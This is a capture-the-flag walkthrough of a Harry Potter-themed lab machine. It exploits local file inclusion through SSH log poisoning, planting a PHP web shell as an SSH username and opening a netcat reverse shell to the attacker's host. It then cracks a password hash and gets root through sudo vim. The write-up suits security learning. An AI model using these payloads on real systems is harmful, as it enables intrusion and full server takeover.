Difficulty: Pure Intermediate
-sC : Default Script
-sV : Version Scan
-A : Aggressive Scan
-p- : Scan all ports TCP/UDP
-oN : Output of text
Navigate on the IP
we have the first hint in the source page, so let’s add it as a directory
Add ikilledsiriusblack.php and let’s review the source page and find a valid parameter to add.
#LFI (Local File Inclusion):
Ok now I didn’t really know what to do, the information was too little, so I found on google an interesting directory /var/log/auth.log where it is possible to ssh-log- poisoning.
RCE with LFI and SSH Log Poisoning
In this article, you will learn how to make unauthorized access in a web server if it is suffering from local file…
I release this article that I found, it could be very useful. So navigate on /var/log/auth.log
Ok now is possible you can ssh log poisoning, you can follow the article or do your own thing. I found a really good command.
ssh ‘<?php echo shell_exec($_GET[“jin”]);?>’@192.168.1.133
Add the parameter “jin” and let’s see if it works. Remember while running the command do CTRL + C and go to the URL
Now with the “jin” parameter we can write and check if ssh-log-poisoning really worked, you can write whatever you want, for example “id”, “ls -la”, “whoami”
ok it looks like the “jin” parameter worked. Remeber add &jin=
Ok it works now! The time has come to load our malicious payload, I have tried various payloads that I have found on the web, but none seem to work, in the end after hours of trying, I have found the right payload.
ncat -e /bin/bash 192.168.1.115 1234 (add this in url)
it’s time to launch it, remember make sure you are listening on the given door.
nc- lnvp 1234
And we are INNNN!!!!!
Now enumerate www-data
I found this file and it appears to be base 64 let’s decrypt it.
Wow we have found secrets, but what is this? A password? to directory? No it was a rabbit hole, that encode was just the directory itself, let’s browse.
Ok inside the secret directory we find 2 files, the first “.dic” seem to be passwords !! While the second file appears to be a hash.
Copy all passwords and put them inside a file.
Here we find the hash instead. I used john to crack the password. But you could use hashcat with -m 1800. (sha512crypt) Remember to use the wordlist found.
YESSSS We have the password for “lestrange”. For convenience we log in with
ssh lestrange@IP and the password found on another shell.
#Horizontal Privilege Escalation:
First thing I did is see if there is any vulnerability in sudo.
Ok we can use vim to become root, in this case use this link, it might be useful:
And we are ROOT!!! Command: sudo /usr/bin/vim -c ‘:!/bin/sh’
I hope I have been useful to you. Good luck guys.